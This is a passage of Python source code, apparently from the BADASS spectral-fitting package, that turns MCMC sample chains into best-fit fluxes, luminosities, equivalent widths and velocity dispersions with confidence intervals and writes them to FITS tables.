print("\n Generating model flux distributions...\n")
# Create a flux dictionary
niter = np.shape(flux_blob)[0]
nwalkers = np.shape(flux_blob)[1]
flux_dict = {}
for key in flux_blob[0][0]:
flux_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the flux_blob for the flux_dict
for i in range(niter):
for j in range(nwalkers):
for key in flux_blob[0][0]:
flux_dict[key]['chain'][j,i] = flux_blob[i][j][key]
for key in flux_dict:
if verbose:
print(' %s' % key)
chain = np.log10(flux_dict[key]['chain']*1.e-17) # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
flux_dict[key]['chain'] = chain
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= -20 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
flux_dict[key]['par_best'] = post_max # maximum of posterior distribution
flux_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
flux_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
flux_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
flux_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
flux_dict[key]['mean'] = post_mean # mean of posterior distribution
flux_dict[key]['std_dev'] = post_std # standard deviation
flux_dict[key]['median'] = post_med # median of posterior distribution
flux_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
flux_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
flux_dict[key]['flag'] = flag
if (plot_flux_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
flux_dict[key]['par_best'] = np.nan # maximum of posterior distribution
flux_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
flux_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
flux_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
flux_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
flux_dict[key]['mean'] = np.nan # mean of posterior distribution
flux_dict[key]['std_dev'] = np.nan # standard deviation
flux_dict[key]['median'] = np.nan # median of posterior distribution
flux_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
flux_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
flux_dict[key]['flag'] = 1
return flux_dict
def lum_plots(flux_dict,burn_in,nwalkers,z,run_dir,H0=70.0,Om0=0.30,plot_lum_hist=True,verbose=True):
"""
Generates best-fit values, uncertainties, and plots for
component luminosities from MCMC sample chains.
"""
if verbose:
print("\n Generating model luminosity distributions...\n")
# Compute luminosity distance (in cm) using FlatLambdaCDM cosmology
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
# Create a flux dictionary
lum_dict = {}
for key in flux_dict:
flux = 10**(flux_dict[key]['chain']) # * 1.e-17
# Convert fluxes to luminosities and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 )) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
lum_dict[key[:-4]+'LUM']= {'chain':lum}
for key in lum_dict:
if verbose:
print(' %s' % key)
chain = lum_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 30 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
lum_dict[key]['par_best'] = post_max # maximum of posterior distribution
lum_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
lum_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
lum_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
lum_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
lum_dict[key]['mean'] = post_mean # mean of posterior distribution
lum_dict[key]['std_dev'] = post_std # standard deviation
lum_dict[key]['median'] = post_med # median of posterior distribution
lum_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
lum_dict[key]['flag'] = flag
if (plot_lum_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
lum_dict[key]['par_best'] = np.nan # maximum of posterior distribution
lum_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
lum_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
lum_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
lum_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
lum_dict[key]['mean'] = np.nan # mean of posterior distribution
lum_dict[key]['std_dev'] = np.nan # standard deviation
lum_dict[key]['median'] = np.nan # median of posterior distribution
lum_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
lum_dict[key]['flag'] = 1
return lum_dict
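# A short worked sketch (not called by BADASS) of the flux-to-luminosity
# conversion used in lum_plots() above: the luminosity distance from the flat
# Lambda-CDM cosmology is converted from Mpc to cm and L = 4*pi*d_L^2*F is
# returned in log10(erg s^-1).  The function name _log10_line_lum_example is an
# assumption for illustration; FlatLambdaCDM and numpy are assumed to be
# imported as elsewhere in this module.
def _log10_line_lum_example(log10_flux_cgs, z, H0=70.0, Om0=0.30):
	"""Sketch: convert log10(flux [erg s^-1 cm^-2]) into log10(luminosity [erg s^-1])."""
	cosmo = FlatLambdaCDM(H0, Om0)
	d_cm = cosmo.luminosity_distance(z).value * 3.086E+24 # 1 Mpc = 3.086e+24 cm
	flux = 10.0**np.asarray(log10_flux_cgs) # erg s^-1 cm^-2
	return np.log10(flux * 4*np.pi * d_cm**2) # log10(erg s^-1)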
def eqwidth_plots(eqwidth_blob, burn_in, nwalkers, run_dir, plot_eqwidth_hist=True,verbose=True):
"""
	Generates best-fit values, uncertainties, and plots for
	component equivalent widths from MCMC sample chains.
"""
if verbose:
print("\n Generating model equivalent width distributions...\n")
# Create a flux dictionary
niter = np.shape(eqwidth_blob)[0]
nwalkers = np.shape(eqwidth_blob)[1]
eqwidth_dict = {}
for key in eqwidth_blob[0][0]:
eqwidth_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the flux_blob for the flux_dict
for i in range(niter):
for j in range(nwalkers):
for key in eqwidth_blob[0][0]:
eqwidth_dict[key]['chain'][j,i] = eqwidth_blob[i][j][key]
for key in eqwidth_dict:
if verbose:
print(' %s' % key)
chain = eqwidth_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 0 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
eqwidth_dict[key]['par_best'] = post_max # maximum of posterior distribution
eqwidth_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
eqwidth_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
eqwidth_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
eqwidth_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
eqwidth_dict[key]['mean'] = post_mean # mean of posterior distribution
eqwidth_dict[key]['std_dev'] = post_std # standard deviation
eqwidth_dict[key]['median'] = post_med # median of posterior distribution
eqwidth_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
eqwidth_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
eqwidth_dict[key]['flag'] = flag
if (plot_eqwidth_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
eqwidth_dict[key]['par_best'] = np.nan # maximum of posterior distribution
eqwidth_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
eqwidth_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
eqwidth_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
eqwidth_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
eqwidth_dict[key]['mean'] = np.nan # mean of posterior distribution
eqwidth_dict[key]['std_dev'] = np.nan # standard deviation
eqwidth_dict[key]['median'] = np.nan # median of posterior distribution
eqwidth_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
eqwidth_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
eqwidth_dict[key]['flag'] = 1
return eqwidth_dict
def cont_lum_plots(cont_flux_blob,burn_in,nwalkers,z,run_dir,H0=70.0,Om0=0.30,plot_lum_hist=True,verbose=True):
"""
	Generates best-fit values, uncertainties, and plots for
	continuum luminosities and AGN/host fractions from MCMC sample chains.
"""
# Create a flux dictionary
niter = np.shape(cont_flux_blob)[0]
nwalkers = np.shape(cont_flux_blob)[1]
cont_flux_dict = {}
for key in cont_flux_blob[0][0]:
cont_flux_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the flux_blob for the flux_dict
for i in range(niter):
for j in range(nwalkers):
for key in cont_flux_blob[0][0]:
cont_flux_dict[key]['chain'][j,i] = cont_flux_blob[i][j][key]
# Compute luminosity distance (in cm) using FlatLambdaCDM cosmology
cosmo = FlatLambdaCDM(H0, Om0)
d_mpc = cosmo.luminosity_distance(z).value
d_cm = d_mpc * 3.086E+24 # 1 Mpc = 3.086e+24 cm
# Create a luminosity dictionary
cont_lum_dict = {}
for key in cont_flux_dict:
# Total cont. lum.
if (key=="F_CONT_TOT_1350"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_TOT_1350"]= {'chain':lum}
if (key=="F_CONT_TOT_3000"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_TOT_3000"]= {'chain':lum}
if (key=="F_CONT_TOT_5100"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_TOT_5100"]= {'chain':lum}
# AGN cont. lum.
if (key=="F_CONT_AGN_1350"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_AGN_1350"]= {'chain':lum}
if (key=="F_CONT_AGN_3000"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_AGN_3000"]= {'chain':lum}
if (key=="F_CONT_AGN_5100"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_AGN_5100"]= {'chain':lum}
# Host cont. lum
if (key=="F_CONT_HOST_1350"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 1350.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_HOST_1350"]= {'chain':lum}
if (key=="F_CONT_HOST_3000"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 3000.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_HOST_3000"]= {'chain':lum}
if (key=="F_CONT_HOST_5100"):
flux = (cont_flux_dict[key]['chain']) * 1.0E-17
			# Convert flux density to continuum luminosity (lambda*L_lambda) and take log10
lum = np.log10((flux * 4*np.pi * d_cm**2 ) * 5100.0) #/ 1.0E+42
lum[~np.isfinite(lum)] = 0
cont_lum_dict["L_CONT_HOST_5100"]= {'chain':lum}
# AGN fractions
if (key=="AGN_FRAC_4000"):
cont_lum_dict["AGN_FRAC_4000"]= {'chain':cont_flux_dict[key]['chain']}
if (key=="AGN_FRAC_7000"):
cont_lum_dict["AGN_FRAC_7000"]= {'chain':cont_flux_dict[key]['chain']}
# Host fractions
if (key=="HOST_FRAC_4000"):
cont_lum_dict["HOST_FRAC_4000"]= {'chain':cont_flux_dict[key]['chain']}
if (key=="HOST_FRAC_7000"):
cont_lum_dict["HOST_FRAC_7000"]= {'chain':cont_flux_dict[key]['chain']}
for key in cont_lum_dict:
if verbose:
print(' %s' % key)
chain = cont_lum_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 0 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
cont_lum_dict[key]['par_best'] = post_max # maximum of posterior distribution
cont_lum_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
cont_lum_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
cont_lum_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
cont_lum_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
cont_lum_dict[key]['mean'] = post_mean # mean of posterior distribution
cont_lum_dict[key]['std_dev'] = post_std # standard deviation
cont_lum_dict[key]['median'] = post_med # median of posterior distribution
cont_lum_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
cont_lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
cont_lum_dict[key]['flag'] = flag
if (plot_lum_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
cont_lum_dict[key]['par_best'] = np.nan # maximum of posterior distribution
cont_lum_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
cont_lum_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
cont_lum_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
cont_lum_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
cont_lum_dict[key]['mean'] = np.nan # mean of posterior distribution
cont_lum_dict[key]['std_dev'] = np.nan # standard deviation
cont_lum_dict[key]['median'] = np.nan # median of posterior distribution
cont_lum_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
cont_lum_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
cont_lum_dict[key]['flag'] = 1
return cont_lum_dict
def int_vel_disp_plots(int_vel_disp_blob,burn_in,nwalkers,z,run_dir,H0=70.0,Om0=0.30,plot_param_hist=True,verbose=True):
"""
	Generates best-fit values, uncertainties, and plots for
	integrated line velocity moments (dispersions) from MCMC sample chains.
"""
if verbose:
print("\n Generating model integrated velocity moment distributions...\n")
# Create a flux dictionary
niter = np.shape(int_vel_disp_blob)[0]
nwalkers = np.shape(int_vel_disp_blob)[1]
int_vel_disp_dict = {}
for key in int_vel_disp_blob[0][0]:
int_vel_disp_dict[key] = {'chain':np.empty([nwalkers,niter])}
# Restructure the int_vel_disp_blob for the int_vel_disp_dict
for i in range(niter):
for j in range(nwalkers):
for key in int_vel_disp_blob[0][0]:
int_vel_disp_dict[key]['chain'][j,i] = int_vel_disp_blob[i][j][key]
for key in int_vel_disp_dict:
if verbose:
print(' %s' % key)
chain = int_vel_disp_dict[key]['chain'] # shape = (nwalkers,niter)
chain[~np.isfinite(chain)] = 0
# Burned-in + Flattened (along walker axis) chain
# If burn_in is larger than the size of the chain, then
# take 50% of the chain length instead.
if (burn_in >= np.shape(chain)[1]):
burn_in = int(0.5*np.shape(chain)[1])
# print('\n Burn-in is larger than chain length! Using 50% of chain length for burn-in...\n')
# Remove burn_in iterations and flatten for histogram
flat = chain[:,burn_in:]
flat = flat.flat
# Subsample the data into a manageable size for the kde and HDI
if len(flat) > 0:
subsampled = np.random.choice(flat,size=10000)
# Histogram; 'Doane' binning produces the best results from tests.
hist, bin_edges = np.histogram(subsampled, bins='doane', density=False)
# Generate pseudo-data on the ends of the histogram; this prevents the KDE
# from weird edge behavior.
n_pseudo = 3 # number of pseudo-bins
bin_width=bin_edges[1]-bin_edges[0]
lower_pseudo_data = np.random.uniform(low=bin_edges[0]-bin_width*n_pseudo, high=bin_edges[0], size=hist[0]*n_pseudo)
upper_pseudo_data = np.random.uniform(low=bin_edges[-1], high=bin_edges[-1]+bin_width*n_pseudo, size=hist[-1]*n_pseudo)
# Calculate bandwidth for KDE (Silverman method)
h = kde_bandwidth(flat)
# Create a subsampled grid for the KDE based on the subsampled data; by
# default, we subsample by a factor of 10.
xs = np.linspace(np.min(subsampled),np.max(subsampled),10*len(hist))
# Calculate KDE
kde = gauss_kde(xs,np.concatenate([subsampled,lower_pseudo_data,upper_pseudo_data]),h)
p68 = compute_HDI(subsampled,0.68)
p95 = compute_HDI(subsampled,0.95)
post_max = xs[kde.argmax()] # posterior max estimated from KDE
post_mean = np.mean(flat)
post_med = np.median(flat)
low_68 = post_max - p68[0]
upp_68 = p68[1] - post_max
low_95 = post_max - p95[0]
upp_95 = p95[1] - post_max
post_std = np.std(flat)
post_mad = stats.median_abs_deviation(flat)
# Quality flags; flag any parameter that violates parameter limits by 1.5 sigma
flag = 0
if ( (post_max-1.5*low_68) <= 0 ):
flag+=1
if ~np.isfinite(post_max) or ~np.isfinite(low_68) or ~np.isfinite(upp_68):
flag+=1
int_vel_disp_dict[key]['par_best'] = post_max # maximum of posterior distribution
int_vel_disp_dict[key]['ci_68_low'] = low_68 # lower 68% confidence interval
int_vel_disp_dict[key]['ci_68_upp'] = upp_68 # upper 68% confidence interval
int_vel_disp_dict[key]['ci_95_low'] = low_95 # lower 95% confidence interval
int_vel_disp_dict[key]['ci_95_upp'] = upp_95 # upper 95% confidence interval
int_vel_disp_dict[key]['mean'] = post_mean # mean of posterior distribution
int_vel_disp_dict[key]['std_dev'] = post_std # standard deviation
int_vel_disp_dict[key]['median'] = post_med # median of posterior distribution
int_vel_disp_dict[key]['med_abs_dev'] = post_mad # median absolute deviation
int_vel_disp_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
int_vel_disp_dict[key]['flag'] = flag
if (plot_param_hist==True):
posterior_plots(key,flat,chain,burn_in,xs,kde,h,
post_max,low_68,upp_68,low_95,upp_95,post_mean,post_std,post_med,post_mad,
run_dir)
else:
int_vel_disp_dict[key]['par_best'] = np.nan # maximum of posterior distribution
int_vel_disp_dict[key]['ci_68_low'] = np.nan # lower 68% confidence interval
int_vel_disp_dict[key]['ci_68_upp'] = np.nan # upper 68% confidence interval
int_vel_disp_dict[key]['ci_95_low'] = np.nan # lower 95% confidence interval
int_vel_disp_dict[key]['ci_95_upp'] = np.nan # upper 95% confidence interval
int_vel_disp_dict[key]['mean'] = np.nan # mean of posterior distribution
int_vel_disp_dict[key]['std_dev'] = np.nan # standard deviation
int_vel_disp_dict[key]['median'] = np.nan # median of posterior distribution
int_vel_disp_dict[key]['med_abs_dev'] = np.nan # median absolute deviation
int_vel_disp_dict[key]['flat_chain'] = flat # flattened samples used for histogram.
int_vel_disp_dict[key]['flag'] = 1
return int_vel_disp_dict
# def write_params(param_dict,flux_dict,lum_dict,eqwidth_dict,cont_lum_dict,int_vel_disp_dict,extra_dict,header_dict,bounds,run_dir,
# binnum=None,spaxelx=None,spaxely=None):
def write_params(param_dict,header_dict,bounds,run_dir,binnum=None,spaxelx=None,spaxely=None):
"""
Writes all measured parameters, fluxes, luminosities, and extra stuff
(black hole mass, systemic redshifts) and all flags to a FITS table.
"""
# Extract elements from dictionaries
par_names = []
par_best = []
ci_68_low = []
ci_68_upp = []
ci_95_low = []
ci_95_upp = []
mean = []
std_dev = []
median = []
med_abs_dev = []
flags = []
# Param dict
for key in param_dict:
par_names.append(key)
par_best.append(param_dict[key]['par_best'])
ci_68_low.append(param_dict[key]['ci_68_low'])
ci_68_upp.append(param_dict[key]['ci_68_upp'])
ci_95_low.append(param_dict[key]['ci_95_low'])
ci_95_upp.append(param_dict[key]['ci_95_upp'])
mean.append(param_dict[key]['mean'])
std_dev.append(param_dict[key]['std_dev'])
median.append(param_dict[key]['median'])
med_abs_dev.append(param_dict[key]['med_abs_dev'])
flags.append(param_dict[key]['flag'])
# Sort param_names alphabetically
i_sort = np.argsort(par_names)
par_names = np.array(par_names)[i_sort]
par_best = np.array(par_best)[i_sort]
ci_68_low = np.array(ci_68_low)[i_sort]
ci_68_upp = np.array(ci_68_upp)[i_sort]
ci_95_low = np.array(ci_95_low)[i_sort]
ci_95_upp = np.array(ci_95_upp)[i_sort]
mean = np.array(mean)[i_sort]
std_dev = np.array(std_dev)[i_sort]
median = np.array(median)[i_sort]
med_abs_dev = np.array(med_abs_dev)[i_sort]
flags = np.array(flags)[i_sort]
# Write best-fit parameters to FITS table
col1 = fits.Column(name='parameter', format='30A', array=par_names)
col2 = fits.Column(name='best_fit', format='E', array=par_best)
col3 = fits.Column(name='ci_68_low', format='E', array=ci_68_low)
col4 = fits.Column(name='ci_68_upp', format='E', array=ci_68_upp)
col5 = fits.Column(name='ci_95_low', format='E', array=ci_95_low)
col6 = fits.Column(name='ci_95_upp', format='E', array=ci_95_upp)
col7 = fits.Column(name='mean', format='E', array=mean)
col8 = fits.Column(name='std_dev', format='E', array=std_dev)
col9 = fits.Column(name='median', format='E', array=median)
col10 = fits.Column(name='med_abs_dev', format='E', array=med_abs_dev)
col11 = fits.Column(name='flag', format='E', array=flags)
cols = fits.ColDefs([col1,col2,col3,col4,col5,col6,col7,col8,col9,col10,col11])
table_hdu = fits.BinTableHDU.from_columns(cols)
if binnum is not None:
header_dict['binnum'] = binnum
# Header information
hdr = fits.Header()
for key in header_dict:
hdr[key] = header_dict[key]
empty_primary = fits.PrimaryHDU(header=hdr)
hdu = fits.HDUList([empty_primary,table_hdu])
if spaxelx is not None and spaxely is not None:
hdu2 = fits.BinTableHDU.from_columns(fits.ColDefs([
fits.Column(name='spaxelx', array=spaxelx, format='E'),
